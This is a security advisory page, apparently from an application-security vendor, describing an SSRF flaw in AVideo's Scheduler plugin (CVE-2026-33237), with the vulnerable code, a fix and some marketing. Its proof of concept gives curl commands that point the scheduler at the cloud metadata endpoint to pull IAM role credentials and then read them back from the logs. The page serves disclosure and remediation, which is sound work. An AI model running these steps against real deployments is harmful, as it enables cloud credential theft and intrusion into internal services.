CVE-2026-33237

CVE-2026-33237 is a medium-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0.

Summary

The Scheduler plugin's run() function in plugin/Scheduler/Scheduler.php calls url_get_contents() with an admin-configurable callbackURL that is validated only by isValidURL() (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through isSSRFSafeURL(), which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network callbackURL to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet.

Details

The vulnerable code is at plugin/Scheduler/Scheduler.php:157-166:

// Line 157: callback URL retrieved and site-root token substituted
$callBackURL = $e->getCallbackURL();
$callBackURL = str_replace('$SITE_ROOT_TOKEN', $global['webSiteRootURL'], $callBackURL);
if (!isValidURL($callBackURL)) {
    return false;
}
// isValidURL() only checks URL format via filter_var(..., FILTER_VALIDATE_URL)
// The critical missing check is:
// if (!isSSRFSafeURL($callBackURL)) { return false; }
if (empty($_executeSchelude[$callBackURL])) {
    $_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);

isValidURL() in objects/functions.php uses filter_var($url, FILTER_VALIDATE_URL), it validates URL syntax only and does not block internal/private network targets.

isSSRFSafeURL() in objects/functions.php:4021 explicitly blocks:

  • 127.x.x.x / ::1 (loopback)
  • 10.x.x.x, 172.16-31.x.x, 192.168.x.x (RFC-1918 private)
  • 169.254.x.x (link-local, including AWS/GCP metadata at 169.254.169.254)
  • IPv6 private ranges

This function was added to the LiveLinks proxy (GHSA-9x67-f2v7-63rw fix, commit 0e5638292) and was previously used in the aVideoEncoder download flow (GHSA-h39h-7cvg-q7j6), but the Scheduler plugin was not updated in either fix wave, leaving it as an incomplete patch.

An admin can configure the callbackURL for a scheduled task via the Scheduler plugin UI and trigger execution immediately via the "Run now" interface.

PoC

# Step 1: Authenticate as admin

# Step 2: Create a scheduled task with cloud metadata SSRF callback
curl -b "admin_session=<session>" -X POST \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/add.json.php \
  -d "callbackURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&status=a&type=&date_to_execute=2026-03-18+12:00:00"

# Step 3: Trigger immediate execution via Scheduler run endpoint
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/run.php

# Step 4: Read the scheduler execution logs
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/get.json.php
# Response includes the AWS metadata API response with IAM role credentials

Expected: Internal network addresses rejected before HTTP request is made.
Actual: The server makes an HTTP request to http://169.254.169.254/latest/meta-data/iam/security-credentials/ and the response (including AWS IAM role credentials) is stored in the scheduler execution log.

Impact

  • Cloud credential theft: On AWS, GCP, or Azure deployments, the attacker can retrieve IAM instance role credentials from the cloud metadata service (169.254.169.254), potentially enabling privilege escalation within the cloud environment.
  • Internal service probing: The attacker can make the server issue requests to internal APIs, microservices, or databases with HTTP interfaces not exposed to the internet.
  • Incomplete patch amplification: The fix for GHSA-9x67-f2v7-63rw and GHSA-h39h-7cvg-q7j6 added isSSRFSafeURL() to specific call sites but not the Scheduler. Deployments that updated expecting comprehensive SSRF protection remain vulnerable via this path.
  • Blast radius: Requires admin access. Impact is significant in cloud-hosted deployments where instance metadata credentials unlock broader infrastructure access.

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2026-33237 has a CVSS score of 5.5 (Medium). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (26.0); upgrading removes the vulnerable code path.

Affected versions

wwbn/avideo (<= 25.0)

Security releases

wwbn/avideo → 26.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add isSSRFSafeURL() validation to the Scheduler callback URL before url_get_contents() is called, consistent with the existing SSRF fixes in plugin/LiveLinks/proxy.php and objects/aVideoEncoder.json.php:

$callBackURL = $e->getCallbackURL();
if (!isValidURL($callBackURL)) {
    return false;
}
// Add this SSRF check, same pattern as LiveLinks proxy fix (GHSA-9x67-f2v7-63rw):
if (!isSSRFSafeURL($callBackURL)) {
    _error_log("Scheduler::run SSRF protection blocked callbackURL: " . $callBackURL);
    return false;
}
if (empty($_executeSchelude[$callBackURL])) {
    $_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);

Frequently Asked Questions

  1. What is CVE-2026-33237? CVE-2026-33237 is a medium-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2026-33237? CVE-2026-33237 has a CVSS score of 5.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33237? wwbn/avideo (composer) versions <= 25.0 is affected.
  4. Is there a fix for CVE-2026-33237? Yes. CVE-2026-33237 is fixed in 26.0. Upgrade to this version or later.
  5. Is CVE-2026-33237 exploitable, and should I be worried? Whether CVE-2026-33237 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33237 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33237? Upgrade wwbn/avideo to 26.0 or later.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.